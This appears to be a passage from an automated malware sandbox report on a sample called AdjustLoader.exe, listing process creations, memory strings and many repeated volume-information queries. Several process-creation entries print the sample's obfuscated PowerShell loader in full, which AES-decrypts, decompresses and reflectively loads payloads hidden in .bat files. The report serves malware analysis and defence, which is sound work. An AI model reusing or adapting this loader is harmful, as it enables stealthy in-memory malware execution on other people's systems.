'$rugem.*i*n*v*o*k*e*($null, $mxfyk);'.replace('*', '');}$xpyqp = 'c:\windows\$nya-onimai3\$nya-loli.bat';$host.ui.rawui.windowtitle = $xpyqp;$wcept=[system.io.file]::readalltext($xpyqp).split([environment]::newline);foreach ($crlwk in $wcept) { if ($crlwk.startswith(':: ')) { $baedl=$crlwk.substring(3); break; }}$uspsf=[string[]]$baedl.split('\');iex '$qjsdb=penjn (oejrn ([*c*o*n*v*e*rt]::*f*r*o*m*b*a*se6*4*s*t*ri*n*g*($uspsf[0])));'.replace('*', '');iex '$kucuo=penjn (oejrn ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($uspsf[1])));'.replace('*', '');gdwhu $qjsdb $null;gdwhu $kucuo (,[string[]] ('')); "
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:tnonkhhduxva{param([outputtype([type])][parameter(position=0)][type[]]$wrantrmmmlzaty,[parameter(position=1)][type]$iejhpfpnzp)$fischmocbia=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+''+[char](102)+''+'l'+'e'+[char](99)+'t'+'e'+''+'d'+''+'d'+''+[char](101)+''+'l'+''+[char](101)+'g'+'a'+'te')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+[char](110)+''+'m'+''+[char](101)+''+[char](109)+''+[char](111)+''+[char](114)+'y'+[char](77)+''+[char](111)+''+[char](100)+'u'+[char](108)+''+[char](101)+'',$false).definetype(''+'m'+''+[char](121)+''+[char](68)+'e'+'l'+''+[char](101)+''+[char](103)+''+'a'+''+[char](116)+''+'e'+''+'t'+''+'y'+''+'p'+'e',''+'c'+''+[char](108)+''+[char](97)+''+'s'+''+[char](115)+','+[char](80)+''+[char](117)+''+'b'+''+'l'+''+[char](105)+''+[char](99)+''+[char](44)+'s'+[char](101)+''+[char](97)+'l'+[char](101)+'d,'+'a'+''+'n'+'s'+[char](105)+'c'+'l'+''+[char](97)+''+'s'+'s,'+[char](65)+''+[char](117)+''+'t'+''+[char](111)+'c'+'l'+''+[char](97)+''+'s'+''+'s'+'',[multicastdelegate]);$fischmocbia.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+'p'+''+[char](101)+'c'+[char](105)+''+'a'+''+[char](108)+''+[char](78)+''+'a'+''+[char](109)+''+[char](101)+''+[char](44)+''+'h'+''+'i'+''+'d'+'e'+[char](66)+''+[char](121)+'s'+[char](105)+''+[char](103)+''+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+''+'l'+''+[char](105)+''+'c'+'',[reflection.callingconventions]::standard,$wrantrmmmlzaty).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+[char](116)+''+'i'+'m'+[char](101)+''+[char](44)+''+'m'+''+[char](97)+''+[char](110)+''+[char](97)+''+[char](103)+'e'+[char](100)+'');$fischmocbia.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+[char](101)+'','p'+[char](117)+''+[char](98)+''+[char](108)+''+'i'+''+[char](99)+',h'+[char](105)+'d'+'e'+''+[char](66)+'y'+'s'+''+'i'+''+[char](103)+''+[char](44)+''+'n'+''+[char](101)+''+[char](119)+''+'s'+'l'+[char](111)+'t'+[char](44)+''+[char](86)+''+[char](105)+''+[char](114)+''+[char](116)+'u'+'a'+''+[char](108)+'',$iejhpfpnzp,$wrantrmmmlzaty).setimplementationflags(''+[char](82)+''+'u'+''+[char](110)+''+[char](116)+''+[char](105)+'m'+'e'+''+','+''+'m'+'a'+[char](110)+'a'+'g'+''+'e'+''+[char](100)+'');write-output $fischmocbia.createtype();}$beuoypwdoubyd=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+'y'+[char](115)+''+'t'+''+[char](101)+''+'m'+''+[char](46)+''+[char](100)+''+'l'+''+[char](108)+'')}).gettype('m'+[char](105)+'cro'+[char](115)+''+'o'+'f'+'t'+'.'+'w'+''+[char](105)+'n32'+[char](46)+'u'+'n'+'s'+'a'+''+[char](102)+''+'e'+''+[char](78)+'a'+[char](116)+''+[char](105)+''+[char](118)+''+'e'+''+[char](77)+'e'+'t'+''+'h'+'o'+[char](100)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function oejrn($jlldq){ $sfhve=[system.security.cryptography.aes]::create(); $sfhve.mode=[system.security.cryptography.ciphermode]::cbc; $sfhve.padding=[system.security.cryptography.paddingmode]::pkcs7; $sfhve.key=[system.convert]::frombase64string('u7zgopjl7imcbldgwt+nl93+9q1owlpv32x7otllcsu='); $sfhve.iv=[system.convert]::frombase64string('ynjt8rkkmfjicvof8wpokg=='); $eafkf=$sfhve.createdecryptor(); $lkiih=$eafkf.transformfinalblock($jlldq, 0, $jlldq.length); $eafkf.dispose(); $sfhve.dispose(); $lkiih;}function penjn($jlldq){ iex '$klrvg=new-object system.io.m*em*or*ys*tr*ea*m(,$jlldq);'.replace('*', ''); iex '$llrlz=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$jrwib=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($klrvg, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $jrwib.copyto($llrlz); $jrwib.dispose(); $klrvg.dispose(); $llrlz.dispose(); $llrlz.toarray();}function gdwhu($jlldq,$mxfyk){ iex '$wgnfa=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$jlldq);'.replace('*', ''); iex '$rugem=$wgnfa.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$rugem.*i*n*v*o*k*e*($null, $mxfyk);'.replace('*', '');}$xpyqp = 'c:\users\user\appdata\local\temp\tmp6432.tmp.bat';$host.ui.rawui.windowtitle = $xpyqp;$wcept=[system.io.file]::readalltext($xpyqp).split([environment]::newline);foreach ($crlwk in $wcept) { if ($crlwk.startswith(':: ')) { $baedl=$crlwk.substring(3); break; }}$uspsf=[string[]]$baedl.split('\');iex '$qjsdb=penjn (oejrn ([*c*o*n*v*e*rt]::*f*r*o*m*b*a*se6*4*s*t*ri*n*g*($uspsf[0])));'.replace('*', '');iex '$kucuo=penjn (oejrn ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($uspsf[1])));'.replace('*', '');gdwhu $qjsdb $null;gdwhu $kucuo (,[string[]] ('')); " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function oejrn($jlldq){ $sfhve=[system.security.cryptography.aes]::create(); $sfhve.mode=[system.security.cryptography.ciphermode]::cbc; $sfhve.padding=[system.security.cryptography.paddingmode]::pkcs7; $sfhve.key=[system.convert]::frombase64string('u7zgopjl7imcbldgwt+nl93+9q1owlpv32x7otllcsu='); $sfhve.iv=[system.convert]::frombase64string('ynjt8rkkmfjicvof8wpokg=='); $eafkf=$sfhve.createdecryptor(); $lkiih=$eafkf.transformfinalblock($jlldq, 0, $jlldq.length); $eafkf.dispose(); $sfhve.dispose(); $lkiih;}function penjn($jlldq){ iex '$klrvg=new-object system.io.m*em*or*ys*tr*ea*m(,$jlldq);'.replace('*', ''); iex '$llrlz=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$jrwib=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($klrvg, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $jrwib.copyto($llrlz); $jrwib.dispose(); $klrvg.dispose(); $llrlz.dispose(); $llrlz.toarray();}function gdwhu($jlldq,$mxfyk){ iex '$wgnfa=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$jlldq);'.replace('*', ''); iex '$rugem=$wgnfa.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$rugem.*i*n*v*o*k*e*($null, $mxfyk);'.replace('*', '');}$xpyqp = 'c:\windows\$nya-onimai3\$nya-loli.bat';$host.ui.rawui.windowtitle = $xpyqp;$wcept=[system.io.file]::readalltext($xpyqp).split([environment]::newline);foreach ($crlwk in $wcept) { if ($crlwk.startswith(':: ')) { $baedl=$crlwk.substring(3); break; }}$uspsf=[string[]]$baedl.split('\');iex '$qjsdb=penjn (oejrn ([*c*o*n*v*e*rt]::*f*r*o*m*b*a*se6*4*s*t*ri*n*g*($uspsf[0])));'.replace('*', '');iex '$kucuo=penjn (oejrn ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($uspsf[1])));'.replace('*', '');gdwhu $qjsdb $null;gdwhu $kucuo (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function oejrn($jlldq){ $sfhve=[system.security.cryptography.aes]::create(); $sfhve.mode=[system.security.cryptography.ciphermode]::cbc; $sfhve.padding=[system.security.cryptography.paddingmode]::pkcs7; $sfhve.key=[system.convert]::frombase64string('u7zgopjl7imcbldgwt+nl93+9q1owlpv32x7otllcsu='); $sfhve.iv=[system.convert]::frombase64string('ynjt8rkkmfjicvof8wpokg=='); $eafkf=$sfhve.createdecryptor(); $lkiih=$eafkf.transformfinalblock($jlldq, 0, $jlldq.length); $eafkf.dispose(); $sfhve.dispose(); $lkiih;}function penjn($jlldq){ iex '$klrvg=new-object system.io.m*em*or*ys*tr*ea*m(,$jlldq);'.replace('*', ''); iex '$llrlz=new-object system.io.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); iex '$jrwib=new-object system.io.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($klrvg, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $jrwib.copyto($llrlz); $jrwib.dispose(); $klrvg.dispose(); $llrlz.dispose(); $llrlz.toarray();}function gdwhu($jlldq,$mxfyk){ iex '$wgnfa=[system.r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$jlldq);'.replace('*', ''); iex '$rugem=$wgnfa.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); iex '$rugem.*i*n*v*o*k*e*($null, $mxfyk);'.replace('*', '');}$xpyqp = 'c:\windows\$nya-onimai3\$nya-loli.bat';$host.ui.rawui.windowtitle = $xpyqp;$wcept=[system.io.file]::readalltext($xpyqp).split([environment]::newline);foreach ($crlwk in $wcept) { if ($crlwk.startswith(':: ')) { $baedl=$crlwk.substring(3); break; }}$uspsf=[string[]]$baedl.split('\');iex '$qjsdb=penjn (oejrn ([*c*o*n*v*e*rt]::*f*r*o*m*b*a*se6*4*s*t*ri*n*g*($uspsf[0])));'.replace('*', '');iex '$kucuo=penjn (oejrn ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($uspsf[1])));'.replace('*', '');gdwhu $qjsdb $null;gdwhu $kucuo (,[string[]] ('')); "
Source: dwm.exe, 0000003B.00000000.2388466287.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 00000038.00000000.2381611181.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003B.00000000.2389293829.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000038.00000000.2381611181.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003B.00000000.2389293829.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: winlogon.exe, 00000038.00000000.2381611181.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003B.00000000.2389293829.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: winlogon.exe, 00000038.00000000.2381611181.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003B.00000000.2389293829.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\cmd.exe Code function: 1_3_00000208442E2A90 cpuid 1_3_00000208442E2A90
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\AdjustLoader.exe Queries volume information: C:\Users\user\Desktop\AdjustLoader.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
